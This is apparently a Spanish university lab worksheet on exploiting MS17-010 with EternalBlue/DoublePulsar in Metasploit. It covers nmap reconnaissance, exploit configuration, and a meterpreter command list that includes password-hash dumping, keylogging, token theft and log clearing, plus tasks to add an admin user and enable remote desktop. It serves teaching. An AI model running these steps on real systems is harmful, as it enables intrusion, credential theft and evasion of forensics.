FUNDACIÓN UNIVERSITARIA JUAN DE CASTELLANOS

FACULTAD DE INGENIERÍA
AUDITORÍA DE SISTEMAS
20/04/2018

TALLER EN CLASE N° 9

ACTIVIDADES PRELIMINARES

En primer lugar, debe tener instalada la máquina virtual con la versión de Kali que le hace
entrega su profesor. Para instalarla tiene que ejecutar el archivo kali-linux-2018.1-vbox-
amd64.ova en VirtualBox, la cual una vez se importa se puede abrir directamente.

El usuario/contraseña de esta distribución es: root/toor

Posteriormente es necesario instalar el exploit Eternalblue-doublepulsar, para lo cual debe

ejecutar los siguientes comandos en una terminal desde el path de root, en el orden indicado a
continuación:

 dpkg –add-architecture i386 && apt-get update && apt-get install wine32
 cd /root
 git clone https://github.com/ElevenPaths/
 cp /root/Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/

PROCESO DE HACKING PARA IDENTIFICAR Y ATACAR VULNERABILIDADES

Según lo visto en clase los siguientes son los pasos para realizar un proceso de hacking:

1. Decidir cuál va a ser la máquina objetivo de la filtración

2. Obtener información acerca de su potencial objetivo
3. Detectar las medidas de seguridad y las vulnerabilidades
4. Aprovechar las vulnerabilidades

DECIDIR CUÁL VA A SER LA MÁQUINA OBJETIVO DE LA FILTRACIÓN

Para realizar este primer paso, es necesario identificar la máquina objetivo a atacar. Para esto
es recomendable utilizar herramientas como NMAP que permitan identfiicar las características
de los equipos que están conectados a la red. Para esto podemos proceder a identificar los hosts
activos mediante un comando como el siguiente:

nmap -sP -PE -PA21,23,80,3389 XXX.XXX.XXX.XXX -YYY

Una vez se realiza el análisis de los hosts activos y se identifica de estos el host objetivo.
OBTENER INFORMACIÓN ACERCA DE SU POTENCIAL OBJETIVO

Una vez seleccionado su potencial objetivo, tenga clara la información principal del equipo como
servicios habilitados (puertos), sistema operativo, entre otros. Para identificar con seguridad los
puertos habilitados lo puede hacer por medio del comando:

nmap –sS XXX.XXX.XXX.XXX

Para identificar el Sistema operativo del potencial objetivo ejecute el comando

nmap –O: XXX.XXX.XXX.XXX

En el ejemplo anterior se identifican como los puertos habilitados 135, 139 y 445. De igual forma
se identifica que el sistema que está corriendo puede ser entre Windows 7, Windows server 2008
o Windows 8.1.

DETECTAR LAS MEDIDAS DE SEGURIDAD Y LAS VULNERABILIDADES

Para identificar las vulnerabilidades que aplican vamos a utilizar el siguiente comando:

nmap -Pn --script vuln XXX.XXX.XXX.XXX

Este comando buscará en la IP objetivo las posibles vulnerabilidades, teniendo en cuenta todas
las características del objetivo. Para nuestro caso de ejemplo, el comando arrojó dos
vulnerabilidades posibles:

 La primera denominada smb-double-pulsar-backdoor, identifica que hay una puerta

trasera (backdoor) instalada en la máquina remota.
 La segunda es una vulnerabilidad asociada con ejecución de código remoto en Microsoft
SMBv1 (ms17-010).
Con esta información es posible obtener información de la vulnerabilidad en internet. Lo
recomendable es buscar por el código del CVE encontrado. En este caso el código del CVE
es 2017-0143 y la siguiente es la información encontrada en la página del CVE:
APROVECHAR LAS VULNERABILIDADES

Una vez identificadas las vulnerabilidades que tiene el objetivo, se procede a aprovecharlas e
ingresar al equipo. Para esto es necesario utilizar la aplicación Metasploit que viene con la
distribución de Kali Linux.

Metasploit es un proyecto de código abierto para la seguridad informática, que proporciona

información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración
"Pentesting" y el desarrollo de firmas para sistemas de detección de intrusos.

Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y

ejecutar exploits contra una máquina remota. Otros subproyectos importantes son las bases de
datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre
seguridad. Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl
aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el
lenguaje Ruby.
En dicha plataforma existen cerca de 1000 exploits para sistemas operativos tan diversos como
Windows, Unix / Linux y Mac OS

Para ingresar a metasploit desde Kali ejecute el comando msfconsole desde una terminal:

Debe aparecerle un prompt denominado msf. Desde este prompt digite el comando search
eternalblue para validar que el exploit existe (se llama
exploit/Windows/smb/eternalblue_doublepulsar):
Nota: Si por algún motivo no encuentra el exploit, ejecute los comandos descritos en el capítulo
Actividades Preliminares.

Ejecute el exploit con el comando “use exploit/Windows/smb/eternalblue_doublepulsar”. Cuando

se ha digitado correctamente el nombre del exploit, el prompt cambia indicando el nombre del
exploit en rojo:
Antes de ejecutar el exploit tenemos que tener claras las opciones que se deben configurar. Para
esto digite el comando “show options”
Es necesario configurar las opciones que falten o que haya que modificar para que el exploit
funcione. Las opciones que hay que configurar son:

 RHOST: Identifica la IP del objetivo a atacar. Se configura mediante el comando “set

RHOST XXX.XXX.XXX.XXX”
 RPORT: Identifica al puerto del objetivo por el cual se va a realizar el ataque. Por defecto
es 445. Si necesita configurarlo hágalo mediante el comando “set RPORT XXXX” donde
XXXX es el puerto
 PROCESSINJECT: Identifica el proceso en el equipo objetivo que permitirá realizar la
inyección. Para nuestro caso va a ser explorer.exe. Configurelo mediante el comando “set
PROCESSINJECT explorer.exe”
 TARGET: Valide que el target sea el correcto. Si el Exploit target que aparece es
incorrecto ejecute el comando “show targets” para identificar el listado del target correcto.
Si desea configurarlo ejecute el comando “set TARGET X”.
Vuelva a ejecutar el comando “Show options” para validar que todas las opciones estén
configuradas correctamente:
Para ejecutar el exploit simplemente puede hacerlo mediante los comandos “run” o “exploit”. El
exploit ha sido exitoso si cambia el prompt a meterpreter como aparece a continuación:
Meterpreter permite ejecutar una gran cantidad de comandos en el equipo remoto, entre los
cuales están:

 help – Abrir uso ayuda Meterpreter

 run scriptname – Ejecutar Meterpreter basado en scripts, para obtener una lista completa
de scripts/meterpreter en el directorio.
 sysinfo – Mostrar la información del sistema en el destino remoto.
 ls – Lista de archivos y carpetas en el objetivo.
 use priv – Cargue el privilegio de la extensión para extender la librería del Meterpreter.
 ps – Mostrar todos los procesos en ejecución y que las cuentas estén asociadas con cada
proceso.
 migrate PID – Migrar específicamente el proceso de ID (PID es el objetivo del proceso ID
ganado desde el comandos PS)
 use incognito – Cargar funciones incógnitas. (Se utiliza para robar fichas y suplantación
de una máquina de destino)
 list_tokens -u –Lista fichas disponibles en el objetivo por el usuario.
 list_tokens -g – Lista fichas disponibles en el objetivo por el grupo.
 impersonate_token DOMAIN_NAME\\USERNAME – Hacerse pasar por una ficha
disponible en el objetivo.
  steal_token PID – Robar las fichas disponibles para un determinado proceso y hacerse
pasar por esa señal.
 drop_token – Deje de hacerse pasar por el token actual.
 getsystem – Intento de elevar los permisos de acceso a nivel de sistema a través de
múltiples vectores de ataque.
 shell – Caer en un shell interactivo con todas las fichas disponibles.
 execute -f cmd.exe -i – Ejecutar cmd.exe e interactuar con él.
 execute -f cmd.exe -i -t – Ejecutar cmd.exe con todas las fichas disponibles.
 execute -f cmd.exe -i -H -t – Ejecutar cmd.exe con todas las fichas disponibles y
convertirlo en un proceso oculto.
 rev2self – Volver al usuario original que utilizó para poner en peligro el objetivo.
 reg command – Interactuar, crear, eliminar, consultar, set, y mucho más en el registro del
destino.
 setdesktop number – Cambiar a una pantalla diferente en función de quién está
conectado.
 screenshot – Tome una captura de pantalla de la pantalla del destino.
 upload file – Subir un archivo a la objetivo.
 download file – Descargar los archivos desde el objetivo.
 keyscan_start – detecte las pulsaciones de teclado en el destino remoto.
 keyscan_dump – Volcar las teclas remotas capturados en el objetivo.
 keyscan_stop – Deje de detectar las pulsaciones de teclado en el destino remoto.
 getprivs – Obtener tantos privilegios como sea posible en el objetivo.
 uictl enable keyboard/mouse –Toma el control del teclado y/o ratón.
 background – Ejecute su shell actual Meterpreter en el fondo.
 hashdump – Volcar todos los hashes en el objetivo.
 use sniffer – Cargue el módulo sniffer.
 sniffer_interfaces – Lista de interfaces disponibles al objetivo.
 sniffer_dump interfaceID pcapname – Comience sniffer en el destino remoto.
 sniffer_start interfaceID packet-buffer – Comience sniffer con una gama específica para
un buffer de paquetes.
 sniffer_stats interfaceID – Coge la información de estadística de la interfaz que está en
sniffer.
 sniffer_stop interfaceID – Detenga el sniffer D:
 add_user username password -h ip – Agregar un usuario en el destino remoto.
 add_group_user “Domain Admins” username -h ip – Añadir un nombre de usuario al grupo
Administradores de dominio en el destino remoto.
 clearev – Borrar el registro de eventos en el equipo de destino.
 timestomp – Cambiar atributos de archivo, como fecha de creación (antiforensics medida)
 reboot – Reinicie el equipo de destino.

Entonces si por ejemplo se desea obtener una imagen de la pantalla del equipo objetivo, basta
digitar el comando “screenshot” y le creará un archivo de imagen con la fondo de pantalla del
equipo atacado.
ACTIVIDADES A DESARROLLAR EN EL EQUIPO ATACADO

1. Obtenga la información de sistema del equipo atacado cuya IP le indique el profesor

2. Ejecute el exploit según los pasos indicados.
3. Obtenga privilegios para ejecutar tareas como administrador (Busque en internet que
exploit le puede servir para esta función).
4. Cree un usuario nuevo en Windows con el nombre victima_<<apellido>> donde
<<apellido>> corresponde a su primer apellido
5. Incluir al usuario creado en el paso 4 en el grupo de Administradores
6. Crear un archivo en la carpeta del equipo atacado C:\temp que contenga el nombre
Hacking_<<apellido>>.txt donde incluirá información del sistema obtenida utilizando los
comandos del meterpreter
7. Habilite remote desktop en el equipo (Busque en internet la forma de hacerlo)
8. Intente ingresar al equipo por remote desktop con el usuario y contraseña que usted creo
previamente.